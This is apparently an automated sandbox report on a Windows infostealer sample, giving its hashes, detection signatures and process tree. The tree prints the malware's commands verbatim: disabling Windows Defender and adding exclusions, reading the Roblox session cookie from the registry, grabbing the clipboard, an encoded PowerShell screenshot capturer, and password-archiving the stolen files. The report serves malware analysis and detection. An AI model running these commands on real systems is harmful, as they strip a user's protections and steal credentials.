Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 12:59

General

  • Target

    90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe

  • Size

    7.4MB

  • MD5

    5d580f3fb5b68dfac3d86b3bfff5e255

  • SHA1

    56322afde25ead27ab27bcc0427c569914c3010a

  • SHA256

    90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4

  • SHA512

    d51c4b509b3f9ee141c468a0f6ce1e4c804bdc773367df463db732251c6f2b53cae3822097fbbfbee771eb92cfbd139b0efadf55d65a76a300ff5d54d12679b1

  • SSDEEP

    98304:FLMc/urErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIHKU73bcgVowgt:F7urErvI9pWjgyvoaYrE41JIuIqoxkt

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe
    "C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe
      "C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1420
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3512
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3448
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:4420
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:4824
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1788
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4592
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1800
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:2576
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:468
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe"
              4⤵
              • Views/modifies file attributes
              PID:396
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3624
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3588
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1516
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2292
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:5032
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:4968
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2068
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
                PID:4084
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3132
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  3⤵
                    PID:2372
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      4⤵
                      • Gathers system information
                      PID:2936
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    3⤵
                      PID:4008
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        4⤵
                          PID:2880
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:1032
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1172
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ovbtupv2\ovbtupv2.cmdline"
                              5⤵
                                PID:4024
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F6C.tmp" "c:\Users\Admin\AppData\Local\Temp\ovbtupv2\CSC6FE5A9D9E4DB4E648A4913E660AF4ED0.TMP"
                                  6⤵
                                    PID:3892
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3948
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:5072
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                  3⤵
                                    PID:4724
                                    • C:\Windows\system32\attrib.exe
                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                      4⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:4464
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4168
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:5080
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1784
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:5104
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2520
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4896
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:4212
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:3980
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4340
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:3000
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:4248
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:3632
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                        3⤵
                                                          PID:3524
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4432
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:4036
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3448
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                            3⤵
                                                              PID:1256
                                                              • C:\Windows\system32\getmac.exe
                                                                getmac
                                                                4⤵
                                                                  PID:4408
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NeniO.zip" *"
                                                                3⤵
                                                                  PID:3064
                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NeniO.zip" *
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:5016
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                  3⤵
                                                                    PID:3168
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic os get Caption
                                                                      4⤵
                                                                        PID:4232
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                      3⤵
                                                                        PID:4496
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic computersystem get totalphysicalmemory
                                                                          4⤵
                                                                            PID:1172
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                          3⤵
                                                                            PID:3084
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic csproduct get uuid
                                                                              4⤵
                                                                                PID:3452
